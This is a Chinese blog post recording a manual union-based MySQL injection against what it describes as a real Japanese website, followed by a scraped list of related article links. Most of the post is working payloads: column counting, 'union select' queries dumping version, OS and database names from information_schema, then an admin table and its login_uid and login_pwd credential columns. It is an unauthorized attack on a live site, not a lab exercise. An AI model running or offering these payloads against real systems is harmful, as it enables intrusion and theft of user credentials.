mysql报错注入实战_MySQL手工注入实战
实战记录,日本某站
注入点 and 语句测试
and1=1 返回正常,and=2跳回首页,可能过滤了
用 ’ 测试返回错误页面
判断为注入点
order by语句查询字段数
测试字段数为9
and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9
报错联合查询语句,查询显示位
2、3为显示位
使用注入函数可爆出数据库版本信息
and 1=2 UNION SELECT 1,@@version_compile_os,3,4,5,6,7,8,9
注入函数@@version_compile_os爆出操作系统
and 1=2 UNION SELECT 1,database(),3,4,5,6,7,8,9
用注入函数database()爆出当前库
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
and1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9 from information_schema.SCHEMATA limit 0,1
库1
爆出第二个数据库,limit1,1即可
发现第二个数据库就是当前库
库2
and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9from information_schema.TABLES whereTABLE_SCHEMA=(库2名字16进制)limit 0,1
爆第一个表名,数据库名要转换为16进制
表1 敏感表
改为limit 1,1可爆第二个表名
表2
and 1=2 union select 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9 from information_schema.TABLES where TABLE_SCHEMA=0x68656E65636961 limit 0,1
使用group_concat(table_name)可以一次爆出全部表名
已得到敏感表名TM_ADMIN_MEMBER,接下来爆字段
表名要转换为16进制
and 1=2 union select
1,COLUMN_NAME,3,4,5,6,7,8,9 from
information_schema.COLUMNSwhere TABLE_NAME= limit 0,1
推荐使用这种方法
and 1=2 union select 1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME= limit 0,1
#COLUMN 翻译为 列
用 group_concat(COLUMN_NAME)函数可以一次爆出全部字段
或者可以修改limit 1,1、limit 2,1.......来一个一个爆出
敏感字段
有敏感表名,敏感字段名后就获取内容
经测试login_uid字段存放的是用户名
login_pwd存放的是密码
and 1=2 union select 1,login_uid,login_pwd,4,5,6,7,8,9 from 表名
接下来的自行脑补.......
欢迎各位大神指点批评!
晨风
mysql报错注入实战_MySQL手工注入实战相关推荐
- mysql 手工注入教程_mysql手工注入步骤
1.一般用 ' " ) 等符号来闭合,再用%23(即#)来注释后面语句. 2.查找数据库,先用order by n猜字段,再用union select 1,2,3 ...n%23来查询. ...
- mysql 报错跳过_mysql跳过主从同步错误
方法一: 适用于5.5版本 mysql>slave stop; mysql>SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1 #跳过一个事务 mysql>s ...
- phpcms mysql 事务_phpcms某站点MySQL报错注入
phpcms某站点MySQL报错注入 Referer可注入:GET /index.php HTTP/1.1Referer: 123*User-Agent: Mozilla/5.0 (iPhone; C ...
- mysql中文注入_SQL注入之Mysql报错注入
--志向和热爱是伟大行为的双翼. 昨天偷懒了没学什么东西,先自我反省一下 - -. 今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中 ...
- SQL注入之Mysql报错注入
--志向和热爱是伟大行为的双翼. 昨天偷懒了没学什么东西,先自我反省一下 - -. 今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中 ...
- 由mysql报错注入引发的探究与思考(Group by, rand函数相关,松散索引扫描、紧凑索引扫描相关)
目录 本文要点 原理探讨(Group by, rand函数相关) 进一步的思考:索引与Group By语句 本文要点 当服务器没有关闭报错回显信息显示时,便可考虑实施报错注入类型的Mysql注入攻击. ...
- cmd mysql 报错_Mysql报错问题汇总
1 远程报错问题 报错问题:Host 'XXX' is not allowed to connect to this MySQL server 1.1 防火墙允许3306端口 首先控制面板--防火墙- ...
- mysql table plugin,MySql报错Table mysql.plugin doesn’t exist的解决方法
MySql报错Table mysql.plugin doesn't exist的解决方法 一般产生原因是手工更改my.ini的数据库文件存放地址导致的 mysql服务启动时候找不到内置数据库" ...
- Mac 使用 mysqlclient 报错 NameError: name ‘_mysql‘ is not defined
Mac 使用 mysqlclient 报错 NameError: name '_mysql' is not defined 作者:Bright Xu Mac 安装 mysqlclient 时会报错 O ...
最新文章
- c语言从stdin读入
- fatal error LNK1112: module machine type 'x64' conflicts with target machine type 'X86'
- 网络推广产品浅析网站想要保持稳定的SEO排名和流量需要做什么?
- php websocket
- IDEA加载mysql 报:java.sql.SQLException: Unknown system variable ‘query_cache_size‘
- Navicat Premium 未保存和已执行SQL存储位置
- 教你消灭 Java 代码的“坏味道”
- c语言编译说文件不存在,c语言编译时缺少头文件,库的解决办法
- oracle+口令+加密算法,Oracle Password Hash
- xlua的hotfixManager
- qca9563修改art区,将2T2R修改为1T1R
- C# 创建基于TCP、HTTP协议的JsonRpc 2.0(可跨平台、跨语言)
- 原生js实现锚点定位,tab跟随内容变化,PC/移动端均适用
- fflush php,php fflush()函数使用实例分析
- java中单元测试ut怎么写_UT单元测试总结基础篇
- matlab:预测股票价格走势
- element 下拉框 el-select 自定义控制某项禁止选择
- 黑盒测试,白盒测试与灰盒测试的比较和区别
- 如何发现Synaptics病毒
- 冯端:漫谈物理学的过去、现在与未来
热门文章
- Odoo (OpenERP/TinyERP)-10.0 (Debian 8)
- [转载]CentOS6nbsp;快速搭建轻量级远程桌面nbsp;Xfcenb
- 五款常用邮件管理系统评测
- ‘(‘:illegal token on right side of ‘::‘
- Val编程-特殊函数使用
- C++ 多线程使用future传递异常
- opengl2 vtk 编译_编译和使用VTK时值得注意的点(待续)
- docker-compose观察实时日志_大数据项目实战之在线教育(03实时需求) - 十一vs十一...
- linux ubuntu bionic,尝试在Linux Ubuntu 18.04 Bionic上安装Docker CE时出现错误?
- Rapidmind计算库性能测试